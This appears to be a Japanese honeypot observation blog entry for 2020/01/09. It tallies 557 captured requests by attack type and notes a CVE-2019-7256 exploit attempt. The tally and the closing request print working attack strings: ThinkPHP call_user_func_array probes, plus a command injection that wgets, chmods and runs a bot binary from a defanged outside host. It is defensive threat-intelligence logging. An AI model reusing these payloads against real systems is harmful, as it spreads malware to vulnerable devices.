WOWHoneypot観察(299日目)
2020/01/09(木)
トータルは557件でした。
ハンティングログは以下です。
94.91.172.33 wget hxxp[:]//switchnets[.]net/hoho.arm7 |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
479 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
37 | アクセス | GET / |
11 | 不正中継の調査 | HEAD hxxp[:]//baidu.com/s |
6 | 調査 | GET /script |
3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | 不正中継の調査 | HEAD hxxp[:]//www.baidu.com/ |
2 | Tomcatの調査 | GET /manager/text/list |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | 不正中継の調査 | GET hxxp[:]//45.76.45.209/ |
1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
1 | Yealinkの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
1 | LineareMerge E3シリーズの脆弱性(CVE-2019-7256)を狙った通信 | GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60 |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
1 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
1 | 不正中継の試み | CONNECT www.baidu.com:80 |
1 | 不正中継の試み | CONNECT www.baidu.com:443 |
1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
LineareMerge E3シリーズの脆弱性(CVE-2019-7256)を狙った通信を観測しました。
GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60 HTTP/1.1
User-Agent: dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)
Host: hxxp[:]//219.99.166[.]213